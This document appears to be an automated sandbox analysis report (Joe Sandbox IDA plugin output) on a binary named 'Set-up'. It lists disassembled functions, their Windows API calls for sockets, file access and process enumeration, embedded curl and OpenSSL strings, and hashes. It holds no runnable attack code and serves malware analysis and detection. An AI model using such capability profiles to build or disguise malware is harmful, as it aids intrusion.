SEND %s:%d send(%lu) = %ld, xrefs: 00A676F8
multi.c, xrefs: 00A676DD, 00A676E9
send, xrefs: 00A6770B, 00A6772A
LIMIT %s:%d %s reached memlimit, xrefs: 00A67712, 00A67731

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 3540913164-3388739168
Opcode ID: 1cbbfb11abc2ab4cec63ce4b7a3fdedc5aba1518c992f963c316ae25eacce3ca
Instruction ID: 74e50536d816715ef96da33afa2b45fd1442ad58aed3b96fe0714244bee93fe5
Opcode Fuzzy Hash: 1cbbfb11abc2ab4cec63ce4b7a3fdedc5aba1518c992f963c316ae25eacce3ca
Instruction Fuzzy Hash: 8511C8B45183446BE530AB65ED4AD7B7BBCEB85B2CF040508F94457341D6A6DD00C7B2

Function 00BE47B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C3E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E5E2
Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E5FA
Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00C3E637
Part of subcall function 00C3E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00BCA31E), ref: 00C3E64D
Part of subcall function 00C3E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00BCA31E,00000001,?,00000008,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000), ref: 00C3E665
Part of subcall function 00C3E5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E678
Part of subcall function 00C3E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E685
Part of subcall function 00C3E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E690
Part of subcall function 00C3E5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E), ref: 00C3E6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00FFAB14), ref: 00BE47CC
GetLastError.KERNEL32(?,?,?,?,?,?,00FFAB14), ref: 00BE483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00FFAB14), ref: 00BE4855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00FFAB14), ref: 00BE4860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00FFAB14), ref: 00BE488E

Strings

calling fopen(%s, %s), xrefs: 00BE4845
BIO_new_file, xrefs: 00BE4829, 00BE4870, 00BE489D
crypto/bio/bss_file.c, xrefs: 00BE4830, 00BE4877, 00BE48A4

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: f4c9c538f26d23bd7167688718ba5e28877f441fb64a01d2c8568d039b152996
Instruction ID: cdd0b316faaccf93825101eb6c2bfdaa2fbdf82172033d06823350aba63343b4
Opcode Fuzzy Hash: f4c9c538f26d23bd7167688718ba5e28877f441fb64a01d2c8568d039b152996
Instruction Fuzzy Hash: FE21D3B1F843447AE23032A13C07F6F3AAADF52B58F140165FA4D682C3F6959915B2B3

Function 00A631D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A631EF
Process32First.KERNEL32 ref: 00A63245
Process32Next.KERNEL32 ref: 00A632CC
CloseHandle.KERNELBASE ref: 00A632E7

Strings

name, xrefs: 00A63272
pid, xrefs: 00A63297
CreateToolhelp32Snapshot failed., xrefs: 00A6320E
processes, xrefs: 00A632F3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: 3bb2dc4154607fa832d0eb76c8242c4e207c28f8ee105006ff18bc44538f0b43
Instruction ID: f22b42da0ee8246e3797ad7a6341c650655370bab18b65c0fa954a69c51a74c5
Opcode Fuzzy Hash: 3bb2dc4154607fa832d0eb76c8242c4e207c28f8ee105006ff18bc44538f0b43
Instruction Fuzzy Hash: E23194B59093059BCB00EFB8D98569EBBF0AF44314F00886DE898E7341E7349A44DF52

Function 00A67770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00A994BF,?), ref: 00A677AE
recv.WS2_32(?,?,00A994BF,?), ref: 00A677BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 00A677F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A67815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6781D

Strings

recv, xrefs: 00A677DB, 00A677FA
LIMIT %s:%d %s reached memlimit, xrefs: 00A677E2, 00A67801
RECV %s:%d recv(%lu) = %ld, xrefs: 00A677C8

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: 78a13fb522a4ec081a1a6493866cb0b47e18a035cf372d9f98de6ae68663955a
Instruction ID: ed34bac62a363283344dc2182b141154e25a385f300944bb9447d02c9133050a
Opcode Fuzzy Hash: 78a13fb522a4ec081a1a6493866cb0b47e18a035cf372d9f98de6ae68663955a
Instruction Fuzzy Hash: 6F1108B45183457BE130AB65AD0AD6B3BBCEBC5F2CF040508F94457341D6A69C00C7F2

Function 00A675E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00A67618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00A67659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A6767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A67685

Strings

socket, xrefs: 00A67643, 00A67662
FD %s:%d socket() = %d, xrefs: 00A6762E
LIMIT %s:%d %s reached memlimit, xrefs: 00A6764A, 00A67669

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: d91ec08c56b511b27ebf75703992a45797a08dd1ec7127ce8aa9daeec0da9370
Instruction ID: 522064897bd825d0855e2c2664be20e2e91284c3a0357981fd461927057e33a4
Opcode Fuzzy Hash: d91ec08c56b511b27ebf75703992a45797a08dd1ec7127ce8aa9daeec0da9370
Instruction Fuzzy Hash: 75115C3561425127D6306B69FC07E9B3FECEF80B38F040114F544962C1D366C850DBE1

Function 00DED1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DED1E8

Strings

@, xrefs: 00DED4B7
Inf, xrefs: 00DEDCA5, 00DEDCBD
NaN, xrefs: 00DEDBAB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 01c2e26627bd05405b8c51db6c0fc3b21b6adf647797cd8c7734b99c820b2b6a
Instruction ID: bb85b821c6d5c503068e7656f2c738c5d341630a63f6d8fa008c898b3d5be421
Opcode Fuzzy Hash: 01c2e26627bd05405b8c51db6c0fc3b21b6adf647797cd8c7734b99c820b2b6a
Instruction Fuzzy Hash: E1F1A17060C7C58BD721AF25C4407ABBBE2BB85314F258A2DD9DD87382DB35D905CBA2

Function 00A9F6C3 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 359networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(?), ref: 00A9F75B

Strings

%s trying next, xrefs: 00A9F8FE
%s done, xrefs: 00A9F9CD
Connected to %s (%s) port %u, xrefs: 00AA0026
%s connect timeout after %lldms, move on!, xrefs: 00A9FA33
%s connect -> %d, connected=%d, xrefs: 00A9F720

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: %s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s trying next$Connected to %s (%s) port %u
API String ID: 1452528299-2219341415
Opcode ID: b51350314da9e9d413a7b12f6437b80ca2d55f9aa3d38c2f94c84281f44f94c1
Instruction ID: 86c9b849606d7eed5ec2f1aa3b2978be7a3a3d952fb14d47fb43ee376d02a01f
Opcode Fuzzy Hash: b51350314da9e9d413a7b12f6437b80ca2d55f9aa3d38c2f94c84281f44f94c1
Instruction Fuzzy Hash: DCE18C30704345AFDB24CF29C584B66BBF1BF85318F18C56CE8998B2A2D771E985CB91

Function 00A99290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A676A0: send.WS2_32(multi.c,?,?,?), ref: 00A676DE

WSAGetLastError.WS2_32 ref: 00A993C3

Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00A9935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A99388

Strings

cf-socket.c, xrefs: 00A992CF
send(len=%zu) -> %d, err=%d, xrefs: 00A99447
Send failure: %s, xrefs: 00A993FB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: c6477a2b523d437ef409730f4dc2b0926603584e5f55c0aeeef24259292bf9a0
Instruction ID: e682ff8be7844d572bf8103650b4ce0c98573bc31e5270a4c8d705e4dbeb7cad
Opcode Fuzzy Hash: c6477a2b523d437ef409730f4dc2b0926603584e5f55c0aeeef24259292bf9a0
Instruction Fuzzy Hash: DB51AD74A00305ABEB11DF28C881FABB7A5FF88314F14852DFD489B282E771E951CB91

Function 00B277B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FC4C2D,00000000,00000000,?,?,?,00B29882,?,00000000), ref: 00B277DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00B277F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00B27802
GetLastError.KERNEL32(?,00000000), ref: 00B2780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00B27830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00B27843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2786B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: dceec2ba982ee69c20fa363a64ceaa042deace054d75d9c413d60defb5e97ef4
Instruction ID: 0f022d4eb8aacaa816e8e62b7b64effd760cc4473282545f528b4e882fbe3cbe
Opcode Fuzzy Hash: dceec2ba982ee69c20fa363a64ceaa042deace054d75d9c413d60defb5e97ef4
Instruction Fuzzy Hash: DF1196E2E8935067EB2125237C8AB7B75C8DB51364F180478FD0DDE282FE66D804D1B6

Function 00A9A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00A9A1C6
WSAGetLastError.WS2_32 ref: 00A9A1D0

Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D0A1
Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0A9
Part of subcall function 00A7D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0CD
Part of subcall function 00A7D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0D7
Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00A7D381
Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00A7D3A2
Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D3BF
Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D3C9
Part of subcall function 00A7D090: SetLastError.KERNEL32(00000000), ref: 00A7D3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A220

Strings

getsockname() failed with errno %d: %s, xrefs: 00A9A1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00A9A23B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: 5f6364c57a30f37fb4d146671e128edda78d781291d142642aaf5f4729a65749
Instruction ID: 6bb69ed9b9d72c5c4a510957a70ffe33f778b3d9ff81408574de727270217663
Opcode Fuzzy Hash: 5f6364c57a30f37fb4d146671e128edda78d781291d142642aaf5f4729a65749
Instruction Fuzzy Hash: 2021F831908280AAFB259B18EC47FE677FCEF91324F044215F98853151FB32698687E2

Function 00A67310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673CA
